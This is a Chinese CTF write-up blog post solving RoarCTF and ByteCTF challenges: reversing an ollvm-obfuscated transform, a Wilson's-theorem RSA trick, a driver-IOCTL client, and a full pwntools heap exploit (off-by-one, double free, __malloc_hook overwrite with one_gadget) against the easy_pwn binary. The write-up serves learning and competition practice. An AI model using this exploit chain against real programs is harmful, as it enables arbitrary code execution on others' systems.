Roarctf+Bytectf

Xzhah 10月 22, 2019

[TOC]

RoarCTF

队里主要打hitcon,然而我唯一有点思路看得懂的re被哥哥们秒了,每当hitcon的题目看崩溃的时候就做做roarctf的题,结果还拿了个逆向二血。。。还有一个只三队做出的re非预期解后面单独发

polyre

加了ollvm,去混淆后白给

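import binascii

# polyre: the binary runs a 64-round bit-serial transform over a 64-bit word
# (after stripping the ollvm flattening it is just "shift left, and XOR in the
# constant POLY when the bit that fell off the top was set").  Because POLY is
# odd, the new LSB is set exactly when the XOR happened, so every round is
# invertible and the flag blocks can be recovered directly.
MASK = 0xFFFFFFFFFFFFFFFF
TOP_BIT = 0x8000000000000000
POLY = 0xB0004B7679FA26B3
ROUNDS = 64


def forward(value, rounds=ROUNDS, poly=POLY):
    """Apply the binary's shift-and-xor round `rounds` times to a 64-bit word.

    One round: `value = (value << 1) & MASK`, then `value ^= poly` if the
    pre-shift MSB was set.  `value` must fit in 64 bits; the result does too.
    """
    for _ in range(rounds):
        carry = value & TOP_BIT != 0
        value = (value << 1) & MASK
        if carry:
            value ^= poly
    return value


def inverse(value, rounds=ROUNDS, poly=POLY):
    """Undo `forward` for `rounds` rounds on a 64-bit word.

    If the LSB is set the forward round XORed in `poly` (its LSB is 1), so
    XOR it back out, shift right and restore the MSB that was shifted away.
    Otherwise the MSB had been clear and a plain right shift recovers the
    previous value.  `poly` must be odd; an even polynomial would make the
    forward round non-injective and this inverse meaningless.
    """
    for _ in range(rounds):
        if value & 1:
            value = ((value ^ poly) >> 1) | TOP_BIT
        else:
            # Shifting a 64-bit value right already clears the MSB.
            value = value >> 1
    return value


def main():
    # Ciphertext block pulled from the binary.  The other blocks of the flag
    # (0x55759f81a2c68ae4, 0xe06ce20c12db1735) were recovered the same way.
    cipher = 0xBC8FF26D43536296
    plain = inverse(cipher)
    print(plain)
    # 16 hex digits, zero-padded, so a leading zero nibble cannot produce an
    # odd-length hex string (hex(x)[2:-1] also depended on Python 2's 'L').
    raw = binascii.unhexlify('%016x' % plain)
    print(raw)        # the write-up records 'ff6{galf' for this run ...
    print(raw[::-1])  # ... i.e. 'flag{6ff': the block is stored little-endian
    # Sanity check of the transform direction: 0x7b46544372616f52 is
    # 'RoarCTF{' little-endian, the flag-header guess the author encrypted.
    print(hex(forward(0x7b46544372616f52)))


if __name__ == "__main__":
    main()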

babyrsa

主要考点在求 B! mod A(A 和 B 都很大,但二者相近)

用威尔逊定理可以求得:A 为素数时有 (A-1)! ≡ -1 (mod A),而 B 与 A 相近,所以 B! ≡ -1 · ((B+1)(B+2)…(A-1))^{-1} (mod A),只需对这少量因子求一次模逆即可。拿到这个值后 flag 就有了

pwn

easy_pwn

off-by-one + chunk overlap(堆块重叠)

参考学弟给的图,基本上就是这题的做法了

最终 double free 之后可以把 fastbin 的 fd 指向 __malloc_hook 附近并写入 one_gadget(fake chunk 的地址要相对 __malloc_hook 向前偏移 0x13,使其 size 字段恰好落在一个 0x7f 字节上,才能通过 fastbin 的 size 检查;写 hook 时前面补 3 个字节)

from pwn import *

#context.log_level = 'debug'

# Local target; pwntools spawns it as a child process and proxies its stdio.
p = process(['./easy_pwn'])

def add(size):
    """Menu option 1: ask the target to allocate a chunk of `size` bytes."""
    for prompt, reply in (('choice: ', '1'), ('size: ', str(size))):
        p.recvuntil(prompt)
        p.sendline(reply)

def edit(idx, size, data):
    """Menu option 2: write `data` into chunk `idx`, declaring `size` bytes.

    `size` is only what the program is told (the exploit passes a value larger
    than the allocation to drive the overflow); `data` is sent raw, without a
    trailing newline, so the payload length is exactly what the caller built.
    """
    answers = (('choice: ', '2'), ('index: ', str(idx)), ('size: ', str(size)))
    for prompt, reply in answers:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.recvuntil('content: ')
    p.send(data)

def remove(idx):
    """Menu option 3: free the chunk stored at index `idx`."""
    for prompt, reply in (('choice: ', '3'), ('index: ', str(idx))):
        p.recvuntil(prompt)
        p.sendline(reply)

def show(idx):
    """Menu option 4: print chunk `idx`; the caller reads the bytes after 'content: '."""
    for prompt, reply in (('choice: ', '4'), ('index: ', str(idx))):
        p.recvuntil(prompt)
        p.sendline(reply)

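# --- Stage 1: off-by-one shrinks a freed chunk so later allocations overlap.
add(0x28)   # idx 0: its one-byte overflow reaches chunk 1's size field
add(0x100)  # idx 1: victim (0x110 with header)
add(0x100)  # idx 2: directly after chunk 1
if args.GDB:
    # Opt in with `GDB` on the command line; an unconditional gdb.attach()
    # needs a terminal and stalls a non-interactive run.
    gdb.attach(p)
# Plant prev_size = 0x100 where the shrunk chunk 1 will end, so the
# "prev_size(next_chunk) == size" check passes once the size is clobbered.
edit(1, 0xf8, '\x00' * 0xf0 + p64(0x100))
remove(1)
# The 0x29th byte overwrites the low byte of freed chunk 1's size (0x111 -> 0x100).
edit(0, 0x28 + 10, '\x00' * 0x29)
add(0x80)   # idx 1: carved from the shrunk chunk
add(0x60)   # idx 3: the remainder; this is the chunk that gets overlapped

# --- Stage 2: chunk 2's header still records the original 0x110 predecessor
# as free, so freeing it merges chunk 1, the region holding chunk 3 and chunk 2
# (and top, if adjacent) into one free region that is then re-carved.
remove(1)
remove(2)
add(0x80)   # idx 1
add(0x100)  # idx 2: overlaps idx 3
add(0x20)   # idx 4: presumably keeps the next free of idx 2 away from top

# --- Stage 3: leak libc through the overlap.
remove(2)   # idx 2 goes to the unsorted bin; its fd lands in idx 3's data
show(3)
p.recvuntil('content: ')
leak = u64(p.recvn(6).ljust(8, '\x00'))
# Offsets look like Ubuntu 16.04 glibc 2.23 (leak = main_arena+88) -- confirm
# against the challenge libc before reuse.
libc_base = leak - 0x3c4b78
if libc_base & 0xfff:
    # libc is mapped page-aligned; a misaligned base means the leak or the
    # offset is wrong, and continuing would only crash the target later.
    raise RuntimeError('libc leak does not give a page-aligned base: %#x' % leak)
one_gadget = libc_base + 0xf02a4
malloc_hook = libc_base + 0x3c4afd   # __malloc_hook - 0x13: fake chunk whose size byte reads 0x7f
success("libc_base: %#x" % libc_base)

# --- Stage 4: fastbin double free via the two indices that alias one chunk.
add(0x60)   # idx 2: same address as idx 3
add(0x60)   # idx 5
remove(2)
remove(5)   # in between so the fastbin top-of-list double-free check passes
remove(3)   # same chunk as idx 2 -> double free
add(0x60)   # idx 2
edit(2, 8, p64(malloc_hook))   # fd -> fake chunk near __malloc_hook
add(0x60)   # idx 3
add(0x60)   # idx 5
add(0x60)   # idx 6: the fake chunk
edit(6, 11, 'a' * 3 + p64(one_gadget))   # 3 bytes of padding land one_gadget on __malloc_hook
# Trigger: another double free makes the allocator's error path call malloc,
# which now goes through the hook.
remove(2)
remove(5)

p.interactive()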

ByteCTF

2333 第一次做驱动题,环境都是现问的朋友现搭的

是一个键盘过滤

注意一些需要 patch 的地方:比如反调试和 0xDEADBEEF 相关的检查(这个最后似乎也没用上,可以直接 nop 掉);Fake_Intel 被拿去算了 MD5,MD5 值再作为 AES 的密钥。

然后根据你的键盘输入生成code,然而题目直接给了code,所以直接改内存值就好了。

最后code拿去参与aes的运算,再写个ring3通信的程序,就可以读出flag。

// ConsoleApplication11.cpp: 定义控制台应用程序的入口点。
//

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
//#include "stdafx.h"
#define DEVICE_LINK_NAME L"\\\\.\\DancingKeys"


//#define CTL_SYS \
// CTL_CODE(FILE_DEVICE_UNKNOWN,0x222404,METHOD_BUFFERED,FILE_ANY_ACCESS)
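int main()
{
    /*
     * Ring-3 client for the DancingKeys driver: opens the device link, issues
     * the IOCTL identified in the write-up (0x222404) and dumps what the driver
     * returns (the decrypted flag once the driver has been patched in memory).
     *
     * Returns 0 on success, 1 when the device cannot be opened or memory is
     * unavailable, so a failed run is distinguishable from a silent one.
     */

    // DEVICE_LINK_NAME is a wide literal, so call the W entry point explicitly
    // instead of relying on the UNICODE macro to resolve CreateFile() to it.
    HANDLE DeviceHandle = CreateFileW(DEVICE_LINK_NAME,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);
    if (DeviceHandle == INVALID_HANDLE_VALUE)
    {
        printf("CreateFile failed: %lu\n", GetLastError());
        return 1;
    }

    // Length handed to the driver as the output buffer size.  Allocate exactly
    // that much, zero-filled, so nothing printed below is stale heap content.
    const DWORD OutBufferSize = 0x64;
    char *BufferData = (char *)calloc(OutBufferSize, sizeof(char));
    if (BufferData == NULL)
    {
        CloseHandle(DeviceHandle);
        return 1;
    }

    // The input buffer is deliberately passed with length 0: the driver's code
    // is patched in memory (see the write-up), so it never needs this data.
    char InBufferData[5] = { '1', '2', '3', '4', '5' };

    DWORD ReturnLength = 0;
    BOOL IsOk = DeviceIoControl(DeviceHandle, 0x222404,
        (LPVOID)InBufferData,
        0,
        (LPVOID)BufferData,
        OutBufferSize,
        &ReturnLength,
        NULL);
    printf("%d\n", IsOk);
    printf("%lu\n", ReturnLength);

    // Print only what the kernel reports it wrote, and never past the buffer
    // we own even if the driver misreports the count.  (If the driver leaves
    // ReturnLength at 0, nothing is printed -- check IsOk/GetLastError then.)
    DWORD BytesToPrint = ReturnLength < OutBufferSize ? ReturnLength : OutBufferSize;
    if (!IsOk)
        BytesToPrint = 0;
    for (DWORD i = 0; i < BytesToPrint; i++)
        printf("%c ", BufferData[i]);
    printf("\n");

    free(BufferData);
    CloseHandle(DeviceHandle);

    printf("Input AnyKey To Exit\r\n");
    getchar();
    return 0;
}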